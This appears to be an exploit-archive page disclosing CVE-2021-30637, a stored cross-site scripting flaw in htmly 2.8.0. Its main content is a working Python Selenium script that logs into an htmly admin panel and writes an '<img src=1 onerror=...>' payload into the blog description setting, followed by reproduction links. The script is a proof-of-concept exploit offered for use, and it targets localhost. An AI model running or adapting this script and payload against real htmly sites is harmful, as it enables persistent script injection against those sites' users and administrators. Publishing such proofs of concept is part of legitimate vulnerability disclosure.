htmly 2.8.0 Cross Site Scripting

htmly 2.8.0 Cross Site Scripting: Posted Apr 15, 2021; Authored by nu11secur1ty, G.Dzhankushev; htmly version 2.8.0 suffers from a persistent cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2021-30637; SHA-256 | 85e18bc2df9abe646cb059b1f16a9324d21a860943c8bb6dfbcd261cfcf66ba6; Download | Favorite | View

htmly 2.8.0 Cross Site Scripting

# Exploit Title: htmly 2.8.0 allows stored XSS
# Authors: @nu11secur1ty & G.Dzhankushev
# Date: 04.15.2021
# Vendor: htmly
# Link: https://github.com/danpros/htmly
# CVE: CVE-2021-30637

[+] Exploit Source:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929

[Exploit Program Code]

#!/usr/bin/python3
# Authors: @nu11secur1ty, G,Dzhankushev
# CVE-2021-30637

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time


#enter the link to the website you want to automate login.
website_link="http://localhost/htmly/login"

#enter your login username
username="nu11secur1ty"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="user"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="submit"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit .ini
browser.get(("http://localhost/htmly/admin/config"))
browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText
= '</span><img src=1 onerror=alert(1) /><span>'")
time.sleep(3)
browser.execute_script("document.querySelector('.btn.btn-primary').click()")

print("If everything is ok, please paste this code in to the Users in
section First Name\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

---------------------------------

# Exploit Title: htmly 2.8.0 allows stored XSS
# Date: 04.15.2021
# Exploit Authotr @nu11secur1ty
# Exploit Debugging: G.Dzhankushev
# Vendor Homepage: htmly
# Software Link: https://github.com/danpros/htmly
# Video: https://www.youtube.com/watch?v=xKRQZYqVlS4

# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-30637

Top Authors In Last 30 Days

Red Hat 292 files
Ubuntu 62 files
Gentoo 32 files
Debian 31 files
LiquidWorm 10 files
Apple 9 files
malvuln 7 files
Ahmet Umit Bayram 4 files
nu11secur1ty 4 files
Adam Gowdiak 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,038)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,588)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,751)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,492)
UNIX (9,397)
UnixWare (187)
Windows (6,658)
Other

htmly 2.8.0 Cross Site Scripting

htmly 2.8.0 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

htmly 2.8.0 Cross Site Scripting

Share This

htmly 2.8.0 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems